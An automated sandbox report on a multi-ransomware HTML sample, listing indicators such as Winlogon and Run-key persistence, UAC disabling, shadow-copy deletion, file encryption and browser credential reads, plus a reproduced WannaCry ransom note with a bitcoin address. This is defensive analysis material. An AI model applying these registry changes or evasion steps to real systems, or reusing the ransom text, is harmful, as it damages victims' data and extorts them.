badrabbit | 08920d5fa03dd4c0d63aaa30be026c00d8b5f56c7ebb2852f2c5f021f06ec8f1

Analysis

max time kernel
1714s
max time network
1743s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
05-07-2024 19:34

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Dual_Keres_Prime.html
Size

780KB
MD5

bce9179b0a24eae8fddb8ff9d6a0e210
SHA1

74b17a58bc1847c42ada876191f7435fe4317ff9
SHA256

08920d5fa03dd4c0d63aaa30be026c00d8b5f56c7ebb2852f2c5f021f06ec8f1
SHA512

57d8da2c4fc1d09b6a483f66da8cfb52d5c782b0658018a55ba8e001c5256bd0d4f144b705ce13fa3adcc5116b2a207fd4c03a21a0df75eb1010d514b6e9eb0a
SSDEEP

3072:9+78i5tlGXgRf25KirmhEZlhneOjcF8rdg78kgHH4J:g78iUKiyhEZlhnK8pWhgHG

Score

10^/10

badrabbit dharma wannacry defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
ransomware badrabbit
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Birele.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\Birele.exe"	Birele.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Contacts a large (1273) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

6728 netsh.exe
4792 netsh.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
6728	netsh.exe
4792	netsh.exe

Drops startup file 3 IoCs

Processes:

WannaCry.EXECoronaVirus.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD3BE9.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD3BF0.tmp	WannaCry.EXE
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe	CoronaVirus.exe

Executes dropped EXE 64 IoCs

Processes:

WannaCry.EXEtaskdl.exeWannaCry.EXE@[email protected]@[email protected]taskhsvc.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exeEmsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exeEmsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe@[email protected]taskse.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	process
3312	WannaCry.EXE
3484	taskdl.exe
4980	WannaCry.EXE
1392	@[email protected]
1856	@[email protected]
3292	taskhsvc.exe
4364	@[email protected]
4388	taskdl.exe
4792	taskse.exe
3972	@[email protected]
4064	taskdl.exe
4824	taskse.exe
3588	@[email protected]
1420	taskdl.exe
4888	taskse.exe
3496	@[email protected]
4456	taskse.exe
1948	@[email protected]
3172	taskdl.exe
2352	taskse.exe
5068	@[email protected]
440	taskdl.exe
3916	@[email protected]
4284	taskse.exe
2956	@[email protected]
2600	taskdl.exe
2052	taskse.exe
4792	@[email protected]
3692	taskdl.exe
400	taskse.exe
4800	@[email protected]
3748	taskdl.exe
1412	taskse.exe
468	@[email protected]
4740	taskdl.exe
5932	taskse.exe
5940	@[email protected]
5984	taskdl.exe
4580	taskse.exe
5636	@[email protected]
5756	taskdl.exe
5552	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
2112	taskse.exe
4332	@[email protected]
1524	taskdl.exe
5784	taskse.exe
5556	@[email protected]
4392	taskdl.exe
2072	Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
1520	taskse.exe
4332	@[email protected]
2148	taskdl.exe
2168	taskse.exe
2368	@[email protected]
3416	taskdl.exe
2944	@[email protected]
3100	taskse.exe
2420	taskdl.exe
7164	taskse.exe
5844	@[email protected]
6240	taskdl.exe
6924	taskse.exe
6912	@[email protected]
6956	taskdl.exe

Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs

defense_evasion

Safe Mode Boot

T1562.009

Processes:

Birele.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys	Birele.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc	Birele.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager	Birele.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys	Birele.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc	Birele.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power	Birele.exe

Loads dropped DLL 8 IoCs

Processes:

taskhsvc.exerundll32.exe

pid process

3292 taskhsvc.exe
3292 taskhsvc.exe
3292 taskhsvc.exe
3292 taskhsvc.exe
3292 taskhsvc.exe
3292 taskhsvc.exe
3292 taskhsvc.exe
692 rundll32.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exe

pid process

1264 icacls.exe
1156 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
3292	taskhsvc.exe
692	rundll32.exe

pid	process
1264	icacls.exe
1156	icacls.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 650445.crdownload	upx
behavioral1/memory/6068-4989-0x0000000000400000-0x0000000000438000-memory.dmp	upx
behavioral1/memory/6068-24056-0x0000000000400000-0x0000000000438000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exeBirele.exereg.exeCoronaVirus.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\oztitnmx349 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\Downloads\\Birele.exe"	Birele.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe"	CoronaVirus.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

CoronaVirus.exe

description	ioc	process
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2547232018-1419253926-3356748848-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2547232018-1419253926-3356748848-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files\desktop.ini	CoronaVirus.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Cerber5.exe

description	ioc	process
File opened (read-only)	\??\u:	Cerber5.exe
File opened (read-only)	\??\y:	Cerber5.exe
File opened (read-only)	\??\z:	Cerber5.exe
File opened (read-only)	\??\h:	Cerber5.exe
File opened (read-only)	\??\i:	Cerber5.exe
File opened (read-only)	\??\s:	Cerber5.exe
File opened (read-only)	\??\t:	Cerber5.exe
File opened (read-only)	\??\j:	Cerber5.exe
File opened (read-only)	\??\x:	Cerber5.exe
File opened (read-only)	\??\q:	Cerber5.exe
File opened (read-only)	\??\r:	Cerber5.exe
File opened (read-only)	\??\b:	Cerber5.exe
File opened (read-only)	\??\k:	Cerber5.exe
File opened (read-only)	\??\o:	Cerber5.exe
File opened (read-only)	\??\p:	Cerber5.exe
File opened (read-only)	\??\m:	Cerber5.exe
File opened (read-only)	\??\n:	Cerber5.exe
File opened (read-only)	\??\v:	Cerber5.exe
File opened (read-only)	\??\w:	Cerber5.exe
File opened (read-only)	\??\a:	Cerber5.exe
File opened (read-only)	\??\e:	Cerber5.exe
File opened (read-only)	\??\g:	Cerber5.exe
File opened (read-only)	\??\l:	Cerber5.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

Processes:

flow	ioc
127	raw.githubusercontent.com
128	raw.githubusercontent.com
146	raw.githubusercontent.com
166	camo.githubusercontent.com
800	raw.githubusercontent.com
805	raw.githubusercontent.com
820	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

CoronaVirus.exe

description ioc process

File created C:\Windows\System32\CoronaVirus.exe CoronaVirus.exe

description	ioc	process
File created	C:\Windows\System32\CoronaVirus.exe	CoronaVirus.exe

Sets desktop wallpaper using registry 2 TTPs 4 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

WannaCry.EXE@[email protected]@[email protected]$uckyLocker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe

Drops file in Program Files directory 64 IoCs

Processes:

CoronaVirus.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\Microsoft.WindowsDesktop.App.runtimeconfig.json.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\fr-FR\msdaremr.dll.mui	CoronaVirus.exe
File created	C:\Program Files\Java\jdk-1.8\legal\jdk\giflib.md.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\7-Zip\Lang\io.txt.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.fi-fi.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui	CoronaVirus.exe
File created	C:\Program Files\7-Zip\Lang\fi.txt.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nb-no.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\icu.md	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\RepoMan.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-crt-multibyte-l1-1-0.dll	CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-string-l1-1-0.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\Microsoft.WindowsDesktop.App.runtimeconfig.json	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\vstoee.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected]	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sl-si.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\vstoee.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\dotnet.exe.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\7-Zip\Lang\ta.txt.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsptb.xml	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InputPersonalization.exe.mui	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-processthreads-l1-1-0.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\joni.md	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\javafx-src.zip.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngom.md	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Buffers.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.cab.cat.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\msinfo32.exe.mui	CoronaVirus.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome.VisualElementsManifest.xml	CoronaVirus.exe
File created	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\clrjit.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\concrt140.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-localization-l1-2-0.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\Microsoft.WindowsDesktop.App.runtimeconfig.json	CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.tr-tr.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp140.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\System\uk-UA\wab32res.dll.mui	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\clretwrc.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Collections.Concurrent.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\7-Zip\Lang\hr.txt.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado15.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\ThirdPartyNotices.txt	CoronaVirus.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-timezone-l1-1-0.dll.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.da-dk.dll	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\Microsoft.NETCore.App.deps.json.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ja-JP\TipTsf.dll.mui	CoronaVirus.exe
File created	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\lcms.md.id-DC6DCDB9.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\oskmenubase.xml	CoronaVirus.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui	CoronaVirus.exe

Drops file in Windows directory 6 IoCs

Processes:

rundll32.exemspaint.exeBadRabbit.exe

description	ioc	process
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\cscc.dat	rundll32.exe
File created	C:\Windows\dispci.exe	rundll32.exe
File opened for modification	C:\Windows\E2A1.tmp	rundll32.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exe

pid process

10708 vssadmin.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1388 taskkill.exe

pid	process
10708	vssadmin.exe

pid	process
1388	taskkill.exe

Modifies registry class 53 IoCs

Processes:

decrypt_WannaCryFake.exemsedge.exemsedge.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	decrypt_WannaCryFake.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	decrypt_WannaCryFake.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2547232018-1419253926-3356748848-1000\{BD5E1AC4-FCF9-46A8-8D2B-C121D5398371}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "6"	decrypt_WannaCryFake.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	decrypt_WannaCryFake.exe
Key created	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	decrypt_WannaCryFake.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	decrypt_WannaCryFake.exe
